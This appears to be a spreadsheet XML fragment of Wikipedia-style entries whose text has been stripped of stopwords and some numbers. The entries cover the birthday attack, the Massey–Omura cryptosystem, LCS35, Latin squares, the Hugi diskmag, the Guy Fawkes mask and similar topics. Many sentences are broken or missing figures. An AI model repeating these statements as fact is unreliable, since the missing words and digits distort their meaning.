weave flexible horizontal wattles, added. also lath plaster basket weaving references external links make wattle fencing step step amazing wattle fences around world</t>
  </si>
  <si>
    <t>Birthday attack</t>
  </si>
  <si>
    <t>birthday attack type cryptographic attack exploits mathematics behind birthday problem probability theory. this attack used abuse communication parties. attack depends higher likelihood collisions found random attack attempts fixed degree permutations (pigeonholes). with birthday attack, possible find collision hash function {\textstyle {\sqrt {2^{n}}}=2^{n/2}} {\textstyle 2^{n}} classical preimage resistance security. there general (though disputed) result quantum computers perform birthday attacks, thus breaking collision resistance, {\textstyle {\sqrt[{3}]{2^{n}}}=2^{n/3}} understanding problem example, consider scenario teacher class students asks everybody's birthday (for simplicity, ignore leap years) determine whether students birthday (corresponding hash collision described further). intuitively, chance seem small. counter-intuitively, probability least student birthday student around (for 30), formula {\displaystyle 1-{\frac {365!}{(365-n)!\cdot 365^{n}}}} teacher picked specific (say, september), chance least student born specific {\displaystyle 1-(364/365)^{30}} 7.9%. birthday attack, attacker prepares many different variants benign malicious contracts, digital signature. pair benign malicious contracts signature sought. fictional example, suppose digital signature string first byte sha-256 hash. pair found indicated green note finding pair benign contracts (blue) pair malicious contracts (red) useless. after victim accepts benign contract, attacker substitutes malicious claims victim signed proven digital signature. mathematics given function {\displaystyle goal attack find different inputs {\displaystyle x_{1},x_{2}} {\displaystyle f(x_{1})=f(x_{2})} such pair {\displaystyle x_{1},x_{2}} called collision. method used find collision simply evaluate function {\displaystyle different input values chosen randomly pseudorandomly result found once. because birthday problem, method rather efficient. specifically, function {\displaystyle f(x)} yields {\displaystyle different outputs equal probability {\displaystyle sufficiently large, expect obtain pair different arguments {\displaystyle x_{1}} {\displaystyle x_{2}} {\displaystyle f(x_{1})=f(x_{2})} evaluating function 1.25 {\displaystyle 1.25{\sqrt {h}}} different arguments average. consider following experiment. from values choose values uniformly random thereby allowing repetitions. p(n; probability experiment least value chosen once. this probability approximated {\displaystyle p(n;h)\approx 1-e^{-n(n-1)/(2h)}\approx 1-e^{-n^{2}/(2h)}} n(p; smallest number values choose, probability finding collision least inverting expression above, find following approximation {\displaystyle n(p;h)\approx {\sqrt {2h\ln {\frac {1}{1-p}}}}} assigning probability collision arrive 1.1774 {\displaystyle n(0.5;h)\approx 1.1774{\sqrt {h}}} q(h) expected number values choose finding first collision. this number approximated {\displaystyle q(h)\approx {\sqrt {{\frac {\pi }{2}}h}}} example, 64-bit hash used, approximately 1.8×1019 different outputs. equally probable (the best case), would take 'only' approximately billion attempts (5.38×109) generate collision using brute force. this value called birthday bound n-bit codes could approximated 2n/2. other examples follows: table shows number hashes n(p) needed achieve given probability success, assuming hashes equally likely. comparison, 10−18 10−15 uncorrectable error rate typical hard disk. theory, hashes uuids, roughly bits, stay within range billion documents, even possible outputs many more.it easy outputs function distributed unevenly, collision could found even faster. notion 'balance' hash function quantifies resistance function birthday attacks (exploiting uneven distribution.) however, determining balance hash function typically require possible inputs calculated thus infeasible popular hash functions families. subexpression {\displaystyle {\frac {1}{1-p}}} equation {\displaystyle n(p;h)} computed accurately small {\displaystyle directly translated common programming languages log(1/(1-p)) loss significance. when log1p available c99) example, equivalent expression -log1p(-p) used instead. done, first column table computed zero, several items second column even correct significant digit. simple approximation good rule thumb used mental calculation relation {\displaystyle p(n)\approx {n^{2} \over 2h}} also written {\displaystyle h\approx {n^{2} \over 2p(n)}} {\displaystyle n\approx {\sqrt {2h\times p(n)}}} .this works well probabilities less equal 0.5. this approximation scheme especially easy working exponents. instance, suppose building 32-bit hashes {\displaystyle h=2^{32}} want chance collision million {\displaystyle p\approx 2^{-20}} many documents could most? 90.5 {\displaystyle n\approx {\sqrt {2\times 2^{32}\times 2^{-20}}}={\sqrt {2^{1+32-20}}}={\sqrt {2^{13}}}=2^{6.5}\approx 90.5} close correct answer digital signature susceptibility digital signatures susceptible birthday attack. message {\displaystyle typically signed first computing {\displaystyle f(m)} {\displaystyle cryptographic hash function, using secret sign {\displaystyle f(m)} suppose mallory wants trick signing fraudulent contract. mallory prepares fair contract {\displaystyle fraudulent {\displaystyle finds number positions {\displaystyle changed without changing meaning, inserting commas, empty lines, versus spaces sentence, replacing synonyms, etc. combining changes, create huge number variations {\displaystyle fair contracts. similar manner, mallory also creates huge number variations fraudulent contract {\displaystyle applies hash function variations finds version fair contract version fraudulent contract hash value, {\displaystyle f(m)=f(m')} presents fair version signing. after signed, mallory takes signature attaches fraudulent contract. this signature "proves" signed fraudulent contract. probabilities differ slightly original birthday problem, mallory gains nothing finding fair fraudulent contracts hash. mallory's strategy generate pairs fair fraudulent contract. birthday problem equations apply {\displaystyle number pairs. number hashes mallory actually generates {\displaystyle avoid attack, output length hash function used signature scheme chosen large enough birthday attack becomes computationally infeasible, i.e. twice many bits needed prevent ordinary brute-force attack. besides using larger length, signer (bob) protect making random, inoffensive changes document signing keeping copy contract signed possession, least demonstrate court signature matches contract, fraudulent one. pollard's algorithm logarithms example algorithm using birthday attack computation discrete logarithms. also collision attack meet-in-the-middle attack notes references mihir bellare, tadayoshi kohno: hash function balance impact birthday attacks. eurocrypt 2004: pp401–418 applied cryptography, bruce schneier external links "what digital signature authentication?" security's crypto faq. "birthday attack" networks crypto faqs</t>
  </si>
  <si>
    <t>Massey-Omura cryptosystem</t>
  </si>
  <si>
    <t>cryptography, three-pass protocol sending messages framework allows party securely send message second party without need exchange distribute encryption keys. such message protocols confused various algorithms passes authentication. called three-pass protocol sender receiver exchange three encrypted messages. first three-pass protocol developed shamir circa 1980, described detail later section. basic concept three-pass protocol party private encryption private decryption key. parties keys independently, first encrypt message, decrypt message. protocol uses encryption function decryption function encryption function uses encryption change plaintext message encrypted message, ciphertext, {\displaystyle e(e,m)} corresponding encryption decryption allows message recovered using decryption function, {\displaystyle d(d,e(e,m))=m} sometimes encryption function decryption function same. order encryption function decryption function suitable three-pass protocol must property message encryption corresponding decryption independent encryption {\displaystyle d(d,e(k,e(e,m)))=e(k,m)} words, must possible remove first encryption even though second encryption performed. this always possible commutative encryption. commutative encryption encryption order-independent, i.e. satisfies {\displaystyle e(a,e(b,m))=e(b,e(a,m))} encryption keys messages commutative encryptions satisfy {\displaystyle d(d,e(k,e(e,m)))=d(d,e(e,e(k,m)))} three-pass protocol works follows: sender chooses private encryption corresponding decryption sender encrypts message sends encrypted message {\displaystyle e(s,m)} receiver. receiver chooses private encryption corresponding decryption super-encrypts first message {\displaystyle e(s,m)} sends doubly encrypted message {\displaystyle e(r,e(s,m))} back sender. sender decrypts second message because commutativity property described {\displaystyle d(t,e(r,e(s,m)))=e(r,m)} message encrypted receiver's private key. sender sends receiver.the receiver decrypt message using namely {\displaystyle d(q,e(r,m))=m} original message. notice operations involving sender's private keys performed sender, operations involving receiver's private keys performed receiver, neither party needs know party's keys. shamir three-pass protocol first three-pass protocol shamir three-pass protocol developed circa 1980. also called shamir no-key protocol sender receiver exchange keys, however protocol requires sender receiver private keys encrypting decrypting messages. shamir algorithm uses exponentiation modulo large prime encryption decryption functions. that e(e,m) d(d,m) large prime. encryption exponent range 1..p-1 gcd(e,p-1) corresponding decryption exponent chosen (mod p-1). follows fermat's little theorem d(d,e(e,m)) shamir protocol desired commutativity property since e(a,e(b,m)) e(b,e(a,m)). massey–omura cryptosystem massey–omura cryptosystem proposed james massey omura 1982 possible improvement shamir protocol. massey–omura method uses exponentiation galois field gf(2n) encryption decryption functions. that e(e,m)=me d(d,m)=md calculations carried galois field. encryption exponent 0&lt;e&lt;2n-1 gcd(e,2n-1)=1 corresponding decryption exponent (mod 2n-1). since multiplicative group galois field gf(2n) order 2n-1 lagrange's theorem implies mde=m gf(2n)* each element galois field gf(2n) represented binary vector normal basis basis vector square preceding one. that basis vectors field element maximum order. using representation, exponentiations powers accomplished cyclic shifts. this means raising arbitrary power accomplished shifts multiplications. moreover, several multiplications performed parallel. this allows faster hardware realizations cost implement several multipliers. security necessary condition three-pass algorithm secure attacker cannot determine information message three transmitted messages {\displaystyle e(s,m)} {\displaystyle e(r,e(s,m))} {\displaystyle e(r,m)} encryption functions used shamir algorithm massey–omura algorithm described above, security relies difficulty computing discrete logarithms finite field. attacker could compute discrete logarithms gf(p) shamir method gf(2n) massey–omura method protocol could broken. could computed messages mrs. when known, easy compute decryption exponent then attacker could compute raising intercepted message power. sakurai shizuya show certain assumptions breaking massey–omura cryptosystem equivalent diffie–hellman assumption. authentication three-pass protocol described provide authentication. hence, without additional authentication protocol susceptible man-in-the-middle attack opponent ability create false messages, intercept replace genuine transmitted messages. references u.s. patent 4,567,600, u.s. patent massey–omura cryptosystem konheim, alan (1981). cryptography: primer. 346–347. menezes, vanoorschot, vanstone, (1996). handbook applied cryptography. 500, 642. sakurai, shizuya, (1998). structural comparison computational difficulty breaking discrete cryptosystems". journal cryptology. 29–43. doi:10.1007/s001459900033.</t>
  </si>
  <si>
    <t>Four Horsemen of the Infocalypse</t>
  </si>
  <si>
    <t>four horsemen infocalypse refers internet facilitate crime, (pejoratively) rhetorical approaches evoking criminals. phrase play four horsemen apocalypse. there appear universally agreed definition horsemen are, usually listed terrorists, drug dealers, pedophiles/child molesters, organized crime. famous definitions cypherpunk faq, states: 8.3.4. "how privacy anonymity attacked?" [...] like many "computer hacker" items, tool "four horsemen": drug-dealers, money-launderers, terrorists, pedophiles.17.5.7. "what limits proposed?" [...] newspapers complaining four horsemen infocalypse: terrorists, pedophiles, drug dealers, money launderers other sources slightly different descriptions generally refer similar activities. history term coined timothy 1988. referred "child pornographers, terrorists, drug dealers, etc.". used phrase express disdain perceived "think children" argumentation government officials others seeking justify limiting civilian cryptography tools. connotations related argumentation continue attached phrase, commonly used wish deride various restrictions internet activity support restrictions. examples "four horsemen" argumentation four supposed threats used individually, depending circumstances:in 2015, conservative party claimed proposed “new communications data legislation strengthen ability disrupt terrorist plots, criminal networks organised child grooming gangs”, echoing "child pornographers, terrorists, drug dealers, etc." quote timothy may. later 2015, gamma group released statement claiming surveillance technology used "against terrorist threats, drug cartels, major organised crime, paedophile rings." justification concerns used target opposition politicians media groups uganda. with money-laundering treated major organised crime, quote matches closely list given cypherpunk faq. also fear, uncertainty doubt think children crypto wars references external links bernal, javier (1999-08-06). "big brother on-line: public private security internet". cybersociology magazine. mccullagh, declan (2007-10-11). "mccullagh's law: when politicians invoke do-this-or-americans-will-die argument". news.com. cnet networks, inc. grossman, wendy (2004-02-27). "ecrimes century". inquirer. doctorow, cory october 2014). "crypto wars redux: fbi's desire unlock private life must resisted". guardian.</t>
  </si>
  <si>
    <t>Bipolar violation</t>
  </si>
  <si>
    <t>bipolar violation, bipolarity violation, bpv, violation bipolar encoding rules pulses polarity occur without intervening pulse opposite polarity. this indicates error transmission signal. t-carrier e-carrier signals transmitted using scheme called bipolar encoding, a.k.a. alternate mark inversion (ami), represented pulse, zero represented pulse. pulses (which represent ones) always alternate polarity, example positive pulses received succession, receiver knows error occurred violation) bits either added deleted original signal. reliable transmission data using scheme requires regular stream pulses; many zero bits succession cause loss synchronization transmitter receiver. ensure always present, exist number modified codes judiciously placed bipolar violations encode long strings consecutive zeroes.</t>
  </si>
  <si>
    <t>LCS35</t>
  </si>
  <si>
    <t>lcs35 cryptographic challenge puzzle rivest 1999. challenge calculate value 14-digit 47-bit) integer, namely 79685186856218, digit 2048 bit) integer product large primes (which given). value used decrypt ciphertext another digit integer. plaintext provides concealed information factorisation allowing solution easily verified. idea behind challenge known find value without knowing factorisation successive squarings. value chosen make brute force calculation take years using 1999 chip speeds starting point taking account moore's law. rivest notes "just failure moore's could make puzzle harder intended, breakthrough factoring would make puzzle easier intended." challenge (and takes name from) 35th anniversary celebrations laboratory computer science, part computer science artificial intelligence laboratory. lcs35 challenge solved april 2019, twenty years later, programmer bernard fabrot. actual text "!!! happy birthday !!!" message.on 2019, ronald rivest published version lcs35 (named csail2019) extend puzzle year 2034. references external links description lcs35 time capsule crypto-puzzle, ronald rivest time capsule opening ceremony</t>
  </si>
  <si>
    <t>Quantum Byzantine agreement</t>
  </si>
  <si>
    <t>byzantine fault tolerant protocols algorithms robust arbitrary types failures distributed algorithms. byzantine agreement protocol essential part task. constant-time quantum version byzantine protocol, described below. introduction byzantine agreement protocol protocol distributed computing. takes name problem formulated lamport, shostak pease 1982, reference historical problem. byzantine army divided divisions division general following properties: each general either loyal traitor byzantine state. generals communicate sending receiving messages. there commands: attack retreat. loyal generals agree plan action: attack retreat. small linear fraction generals cause protocol fail (less {\displaystyle {\tfrac {1}{3}}} fraction).(see proof impossibility result). problem usually equivalently restated form commanding general loyal lieutenants general either loyal traitor lieutenants following properties. loyal lieutenants carry order. commanding general loyal, loyal lieutenants obey order sends. strictly less {\displaystyle {\tfrac {1}{3}}} fraction including commanding general traitors. byzantine failure resilience failures algorithm protocol categorized three main types: failure take another execution step algorithm: this usually referred "fail stop" fault. random failure execute correctly: this called "random fault" "random byzantine" fault. arbitrary failure algorithm fails execute steps correctly (usually clever adversary make whole algorithm fail) also encompasses previous types faults; called "byzantine fault".a byzantine resilient byzantine fault tolerant protocol algorithm algorithm robust kinds failures mentioned above. example, given space shuttle multiple redundant processors, processors give conflicting data, processors sets processors believed? solution formulated byzantine fault tolerant protocol. sketch algorithm sketch asynchronous algorithm algorithm works phases: phase (communication phase):all messages sent received round. coin flipping protocol procedure allows parties trust toss coin particular object.there types coin flipping protocols weak coin flipping protocols: players initially start inputs compute value {\displaystyle c_{a},c_{b}\in [0,1]} able accuse anyone cheating. protocol successful agree outcome. outcome defined winning winning. protocol following properties: players honest (they follow protocol), agree outcome protocol {\displaystyle c_{a}=c_{b}} {\displaystyle pr(c_{a}=c_{b}=b)={\tfrac {1}{2}}} {\displaystyle a,b\in \{0,1\}} players honest (i.e., player deviate arbitrarily protocol local computation), party wins probability {\displaystyle {\tfrac {1}{2}}+\epsilon words, dishonest, {\displaystyle pr(c_{a}=c_{b}=1)\leq {\tfrac {1}{2}}+\epsilon dishonest, {\displaystyle pr(c_{a}=c_{b}=0)\leq {\tfrac {1}{2}}+\epsilon strong coin flipping protocol: strong coin flipping protocol, goal instead produce random biased away particular value clearly, strong coin flipping protocol bias {\displaystyle \epsilon leads weak coin flipping bias. verifiable secret sharing verifiable secret sharing protocol: (n,k) secret sharing protocol allows players share secret, quorum players discover secret. player sharing (distributing secret pieces) secret usually referred dealer. verifiable secret sharing protocol differs basic secret sharing protocol players verify shares consistent even presence malicious dealer. fail-stop protocol protocol quantum coin flip player {\displaystyle p_{i}} round generate state {\displaystyle |\mathrm {coin} _{i}\rangle ={\tfrac {1}{\sqrt {2}}}|0,0,\ldots ,0\rangle +{\tfrac {1}{\sqrt {2}}}|1,1,\ldots ,1\rangle {\displaystyle qubits send {\displaystyle qubit {\displaystyle player keeping part generate state {\displaystyle |\mathrm {leader} _{i}\rangle ={\tfrac {1}{n^{3/2}}}\sum \nolimits _{a=1}^{n^{3}}|a,a,\ldots ,a\rangle {\displaystyle qubits, equal superposition numbers {\displaystyle n^{3}} distribute {\displaystyle qubits players receive quantum messages players wait next communication round, thus forcing adversary choose messages passed. round measure standard base) {\displaystyle \mathrm {leader} _{j}} qubits received round select player highest leader value (ties broken arbitrarily) "leader" round. measure leader's coin standard base. output quantumcoinflip protocol: {\displaystyle v_{i}} measurement outcome leader's coin. byzantine protocol generate random coin assign integer range [0,n-1] player player allowed choose random player {\displaystyle p_{k}} selects random number {\displaystyle s{_{k}^{i}}} every player {\displaystyle p_{i}} distributes using verifiable secret sharing scheme. phase players agree secrets properly shared, secrets opened player {\displaystyle p_{i}} assigned value secrets properly shared {\displaystyle s_{i}=\sum \,{s_{k}^{i}}{\text{for secrets properly shared}}\mod this requires private information channels replace random secrets superposition {\displaystyle |\phi \rangle ={\tfrac {1}{\sqrt {n}}}\sum \nolimits _{a=0}^{n-1}|a\rangle state encoded using quantum verifiable secret sharing protocol (qvss). cannot distribute state {\displaystyle |\phi ,\phi ,\ldots \phi \rangle since players collapse state. prevent players encode state using quantum verifiable secret sharing (qvss) send player share secret. here verification requires byzantine agreement, replacing agreement grade-cast protocol enough. grade-cast protocol grade-cast protocol following properties using definitions informally, graded broadcast protocol protocol designated player called “dealer” (the broadcasts) that: dealer good, players message. even dealer bad, good player accepts message, good players message (but accept it).a protocol said achieve graded broadcast beginning protocol, designated player (called dealer) holds value protocol, every player {\displaystyle p_{i}} outputs pair {\displaystyle (\mathrm {value} _{i},\mathrm {confidence} _{i})} following properties hold: {\displaystyle (\forall i,\mathrm {confidence} _{i}\in \{0,1,2\})} honest, {\displaystyle \mathrm {value} _{i}} {\displaystyle \mathrm {confidence} _{i}} every honest player {\displaystyle p_{i}} honest players {\displaystyle p_{i}} {\displaystyle p_{j},} {\displaystyle \vert \mathrm {confidence} _{i}-\mathrm {confidence} _{j}\vert \leq (consistency) honest players {\displaystyle p_{i}} {\displaystyle p_{j}} {\displaystyle \mathrm {confidence} _{i}&gt;0} {\displaystyle \mathrm {confidence} _{j}&gt;0} {\displaystyle \mathrm {value} _{i}=\mathrm {value} _{j}} .for {\displaystyle t&lt;{\tfrac {n}{4}}} verification stage qvss protocol guarantees good dealer correct state encoded, any, possibly faulty dealer, particular state recovered recovery stage. note purpose byzantine quantum coin flip protocol recovery stage much simpler. each player measures share qvss sends classical value players. verification stage guarantees, high probability, presence {\displaystyle t&lt;{\tfrac {n}{4}}} faulty players good players recover classical value (which value would result direct measurement encoded state). remarks 2007, quantum protocol byzantine agreement demonstrated experimentally using four-photon polarization-entangled state. this shows quantum implementation classical byzantine agreement protocols indeed feasible. references</t>
  </si>
  <si>
    <t>SMASH (hash)</t>
  </si>
  <si>
    <t>smash cryptographic hash function created lars knudsen. smash comes versions: 256-bit 512-bit. each version supposed rival sha-256 sha-512, respectively, however, shortly smash presentation 2005, attack vector smash discovered left hash broken. specifications message length limited less 2128 smash-256 2256 smash-512. definition input: 256/512-bit message blocks {\displaystyle m_{1},m_{2},...,m_{t}} {\displaystyle \theta gf(2^{n})} {\displaystyle h_{0}=f(iv)\oplus {\displaystyle h_{i}=h(h_{i-1},m_{i})=f(h_{i_{1}}\oplus m_{i})\oplus m_{i}\oplus \theta m_{i}} {\displaystyle h_{t+1}=f(h_{t})\oplus h_{t}} function complex compression function consisting h-rounds l-rounds using s-boxes, linear diffusion variable rotations, details found details s-boxes smash derived versions serpent ones. references</t>
  </si>
  <si>
    <t>Hugi</t>
  </si>
  <si>
    <t>hugi longest lasting, frequently released demoscene underground disk magazines (diskmag) ibm-pc. history first issues german language released 1996. from issue magazine issued german english. with issue german part became separate magazine called hugi.ger. moreover, years 1998 2000 weekly newsletter continued tradition similar publications demonews. hugi developed kind electronic school magazine successful long-living demoscene underground magazines. contents mainly based contributions readers proofread formatted editors. topics include graphics, demos, demoparties, programming, diskmags, reports, politics literature. each issue also features graphics background music. articles hugi cited three doctoral theses demoscene published years 2011 2017. book hacking europe from computer cultures demoscenes, 2014, mentions hugi well chapters. issues issues released june 2014, partially completely german. issues also translated russian language. moreover, five issues german language offspring hugi.ger, newsletters special editions (coding digest, hugibox music disk, interview bonanza special edition released. main editor hugi, claus volko (vienna, austria), also known “adok” demoscene. hugi first diskmags released windows executable (september 1998). moreover, dual windows diskmag issues (september 1998 august 1999). both facts strongly notable time caused discussion. magazine uses engine "panorama", created hugi polish programmer chris dragan. many electronical magazines nowadays also based criticism hugi attracted large amount controversy roughly 26th issue; many sceners complained large portion articles uninteresting related demoscene itself. this problem emphasized fact hugi editors accused spamming demoscene forums requests articles, even though considerable portion scene denounced hugi time. interest since rekindled latest issues, editor crew announced apply intense quality control articles. 30th issue hugi subject confusion appeared 'demoscene' section magazine could accessed self-confessed 'iq-test'. test viewed demoscener readers gratuitous serving practical purpose, especially relatively easily bypassable e.g. trial error.the 35th issue hugi raised unseen backlash, discovered contained article opposing immigration europe islamic african countries immigrants' religion allegedly while article removed within hours, questions raised whether article slipped quality control (the scenario supported editors, considered preposterous readers), included simply yellow journalistic value, whether main editor adok simply included article agreed content, initially apologize comment issue. article later revealed author complete ruse copy-paste wikipedia text written finnish philologist, aimed test whether article content could final magazine. diskmag near-universally condemned, amid additional accusations "jumping bandwagon" started diskmag zine "headlines" demo increase anticipation, copying zine's unique 3-by-2 thumbnailed layout "roundtable" interviews. 36th issue hugi, april 2010, garnered mostly positive feedback. hugi size coding competition hugi staff also hosts popular series online assembler programming size-optimizing contests called “hugi size coding competition”. objective implement given program using little space possible. this results executable files size less kilobyte. since 1998, competitions held far. number participants contest usually participants come virtually world (north america, europe, east asia, south africa, australia,...). every contestant gets points depending size entry. after competition, entries released together source codes, discussion mailing list occurs objections regarding validity entries made. authors invalid entries penalty. once year, "world league table" generated points contests held year added together. references external links official website hugi magazine official website hugi size coding competition hugi fr:pouët hugi scene.org</t>
  </si>
  <si>
    <t>Latin square</t>
  </si>
  <si>
    <t>combinatorics experimental design, latin square array filled different symbols, occurring exactly exactly column. example latin square name "latin square" inspired mathematical papers leonhard euler (1707–1783), used latin characters symbols, symbols used: example, alphabetic sequence replaced integer sequence euler began general theory latin squares. history korean mathematician choi seok-jeong first publish example latin squares order nine, order construct magic square 1700, predating leonhard euler years. reduced form latin square said reduced (also, normalized standard form) first first column natural order. example, latin square reduced first column rather latin square reduced permuting (that reordering) rows columns. here switching matrix's second third rows yields following square: this latin square reduced; first first column alphabetically ordered properties orthogonal array representation entry latin square written triple (r,c,s), row, column, symbol, obtain triples called orthogonal array representation square. example, orthogonal array representation latin square },where example triple means column symbol orthogonal arrays usually written array form triples rows, definition latin square written terms orthogonal arrays: latin square triples ordered pairs distinct, ordered pairs distinct, ordered pairs distinct.this means ordered pairs pairs each. true ordered pairs ordered pairs orthogonal array representation shows rows, columns symbols play rather similar roles, made clear below. equivalence classes latin squares many operations latin square produce another latin square (for example, turning upside down). permute rows, permute columns, permute names symbols latin square, obtain latin square said isotopic first. isotopism equivalence relation, latin squares divided subsets, called isotopy classes, squares class isotopic squares different classes isotopic. another type operation easiest explain using orthogonal array representation latin square. systematically consistently reorder three items triple (that permute three columns array form), another orthogonal array (and, thus, another latin square) obtained. example, replace triple (r,c,s) (c,r,s) corresponds transposing square (reflecting main diagonal), could replace triple (r,c,s) (c,s,r), complicated operation. altogether possibilities including nothing", giving latin squares called conjugates (also parastrophes) original square.finally, combine equivalence operations: latin squares said paratopic, also main class isotopic, isotopic conjugate other. this equivalence relation, equivalence classes called main classes, species, paratopy classes. each main class contains isotopy classes. number there known easily computable formula number latin squares symbols 1,2,...,n. accurate upper lower bounds known large apart. classic result simple explicit formula number latin squares published 1992, still easily computable exponential increase number terms. this formula number latin squares matrices, σ0(a) number zero entries matrix per(a) permanent matrix a.the table contains known exact values. seen numbers grow exceedingly quickly. number latin squares altogether (sequence a002860 oeis) times number reduced latin squares (sequence a000315 oeis). isotopy class (sequence a040082 oeis) contains (n!)3 latin squares (the exact number varies), main class (sequence a003090 oeis) contains either isotopy classes. number structurally distinct latin squares (i.e. squares cannot made identical means rotation, reflection, and/or permutation symbols) 192, 145164, 1524901344 respectively (sequence a264603 oeis). examples give example latin square main class order five. they present, respectively, multiplication tables following groups: trivial 1-element group {\displaystyle \mathbb _{2}} binary group {\displaystyle \mathbb _{3}} cyclic group order {\displaystyle \mathbb _{2}\times \mathbb _{2}} klein four-group {\displaystyle \mathbb _{4}} cyclic group order {\displaystyle \mathbb _{5}} cyclic group order last example quasigroup, rather loop, associative. transversals rainbow matchings transversal latin square choice cells, contains cell, column contains cell, cell containing symbol. consider latin square complete bipartite graph rows vertices part, columns vertices part, cell edge (between column), symbols colors. rules latin squares imply proper edge coloring. with definition, latin transversal matching edge different color; matching called rainbow matching. therefore, many results latin squares/rectangles contained papers term "rainbow matching" title, vice versa.some latin squares transversal. example, even, n-by-n latin square value cell (i+j) transversal. here examples:in 1967, ryser conjectured that, odd, every n-by-n latin square transversal.in 1975, stein brualdi conjectured that, even, every n-by-n latin square partial transversal size n−1.a general conjecture stein transversal size exists latin squares also n-by-n array symbols, long symbol appears exactly times.some weaker versions conjectures proved: every n-by-n latin square partial transversal size 2n/3. every n-by-n latin square partial transversal size sqrt(n). every n-by-n latin square partial transversal size log22(n). algorithms small squares possible generate permutations test whether latin square property met. larger squares, jacobson matthews' algorithm allows sampling uniform distribution space latin squares. applications statistics mathematics design experiments, latin squares special case row-column designs blocking factors. algebra, latin squares related generalizations groups; particular, latin squares characterized multiplication tables (cayley tables) quasigroups. binary operation whose table values forms latin square said obey latin square property. error correcting codes sets latin squares orthogonal found application error correcting codes situations communication disturbed types noise simple white noise, attempting transmit broadband internet powerlines.firstly, message sent using several frequencies, channels, common method makes signal less vulnerable noise specific frequency. letter message sent encoded sending series signals different frequencies successive time intervals. example below, letters encoded sending signals four different frequencies, four time slots. letter instance, encoded first sending frequency encoding twelve letters formed three latin squares orthogonal other. imagine there's added noise channels whole transmission. letter would picked words, first slot receive signals frequency frequency third slot signals frequencies because noise, longer tell first slots 2,2. case yields sequence matching letter table, letter similarly, imagine burst static frequencies third slot: again, able infer table encodings must letter transmitted. number errors code spot less number time slots. also proven number frequencies prime power prime, orthogonal latin squares produce error detecting codes efficient possible. mathematical puzzles problem determining partially filled square completed form latin square np-complete.the popular sudoku puzzles special case latin squares; solution sudoku puzzle latin square. sudoku imposes additional restriction nine particular adjacent subsquares must also contain digits standard version). also mathematics sudoku. recent kenken strimko puzzles also examples latin squares. board games latin squares used basis several board games, notably popular abstract strategy game kamisado. agronomic research latin squares used design agronomic research experiments minimise experimental errors. heraldry latin square also figures arms statistical society canada, specifically mentioned blazon. also, appears logo international biometric society. generalizations latin rectangle generalization latin square columns possible values, number rows smaller each value still appears column. graeco-latin square pair latin squares that, laid other, ordered pair symbols appears exactly once. latin hypercube generalization latin square dimensions multiple dimensions. also block design combinatorial design eight queens puzzle futoshiki magic square problems latin squares rook's graph, graph latin squares colorings sator square vedic square word square notes references bailey, r.a. (2008). row-column designs more latin squares". design comparative experiments. cambridge university press. isbn 978-0-521-68357-9. 2422352. dénes, keedwell, (1974). latin squares applications. york-london: academic press. 547. isbn 0-12-209350-x. 0351850. shah, kirti sinha, bikas (1989). row-column designs". theory optimal designs. lecture notes statistics. vol. springer-verlag. 66–84. isbn 0-387-96991-8. 1016151. {{cite book}}: external link |series= (help) lint, wilson, (1992). course combinatorics. cambridge university press. 157. isbn 0-521-42260-4. further reading dénes, keedwell, (1991). latin squares: developments theory applications. annals discrete mathematics. vol. paul erdős (foreword). amsterdam: academic press. isbn 0-444-88899-3. 1096296. hinkelmann, klaus; kempthorne, oscar (2008). design analysis experiments. vol. (second ed.). wiley. isbn 978-0-470-38551-7. 2363107. hinkelmann, klaus; kempthorne, oscar (2008). design analysis experiments, volume introduction experimental design (second ed.). wiley. isbn 978-0-471-72756-9. 2363107. hinkelmann, klaus; kempthorne, oscar (2005). design analysis experiments, volume advanced experimental design (first ed.). wiley. isbn 978-0-471-55177-5. 2129060. knuth, donald (2011). computer programming, volume combinatorial algorithms, part reading, massachusetts: addison-wesley. isbn 978-0-201-03804-0. laywine, charles mullen, gary (1998). discrete mathematics using latin squares. wiley-interscience series discrete mathematics optimization. york: john wiley sons, inc. isbn 0-471-24064-8. 1644242. shah, sinha, bikas (1996). "row-column designs". ghosh (ed.). design analysis experiments. handbook statistics. vol. amsterdam: north-holland publishing 903–937. isbn 0-444-82061-2. 1492586. raghavarao, damaraju (1988). constructions combinatorial problems design experiments (corrected reprint 1971 wiley ed.). york: dover. isbn 0-486-65685-3. 1102899. street, anne penfold; street, deborah (1987). combinatorics experimental design. york: oxford university press. isbn 0-19-853256-3. 0908490. berger, paul maurer, robert celli, giovana (november 2017). experimental design applications management, engineering, sciences (2nd edition (november 2017) ed.). springer. 267–282. external links weisstein, eric "latin square". mathworld. latin squares encyclopaedia mathematics latin squares online encyclopedia integer sequences</t>
  </si>
  <si>
    <t>Guy Fawkes mask</t>
  </si>
  <si>
    <t>fawkes mask stylised depiction fawkes, best-known member gunpowder plot, attempt blow house lords london november 1605. mask effigy long roots part fawkes night celebrations. illustrator david lloyd stylised smiling face cheeks, wide moustache upturned ends, thin vertical pointed beard; design came represent broad protest used major plot element vendetta (1982–1989) 2005 film adaptation. after appearing forums became well-known symbol online hacktivist group anonymous, used project chanology, occupy movement, anonymous voiceless, anti-establishment protests around world. this popular name anonymous mask. origins gunpowder plot 1605 commemorated early burning effigies unpopular figures. towards 18th century, reports appeared children begging money grotesquely masked effigies fawkes, november gradually became known fawkes night, although many prefer term "bonfire night". from 1864 chambers book days: universal mode observance part england dressing scarecrow figure cast-habiliments procured (the head-piece, generally paper-cap, painted knotted paper strips imitation ribbons), parading chair streets, nightfall burning great solemnity huge bonfire 1847, lancet published "notes case death from fright," death two-year-old attributed fright caused seeing wearing fawkes mask.in 20th century, large numbers cheap cardboard paper fawkes masks sold children autumn given free comics; 1980s popularity became increasingly supplanted halloween. 1958, wearing fawkes masks mentioned debate parliament western australia example harmless excusable (though technically unlawful) possession face mask night. j.j. brady said, time traditional wear masks fawkes night. tonight anyone found wearing fawkes mask minister police, duly excused." british comic book series vendetta, started 1982, "centers vigilante's efforts destroy authoritarian government dystopian future united kingdom". main character wears fawkes mask, climax 2005 film adaptation, thousands protesters adopt costume march parliament.when developing story, illustrator david lloyd made handwritten note: "why portray resurrected fawkes, complete papier-mâché masks, cape conical hat? he'd look really bizarre would give fawkes image he's deserved years. burn chap every nov. celebrate attempt blow parliament!" writer alan moore commented that, lloyd's idea, "all various fragments head suddenly fell place, united behind single image fawkes mask." also noted "how interesting taken image right point apparently purged annals english iconography." adoption protesters background since 2005 release film vendetta, fawkes masks become widespread internationally among groups protesting politicians, banks, financial institutions. masks conceal identity protect face individuals demonstrate commitment shared cause.the character developed internet meme, common imageboards 4chan well video-sharing based sites youtube. initially character, stick figure failed everything, emerged became known "epic fail guy" (efg). reasons never 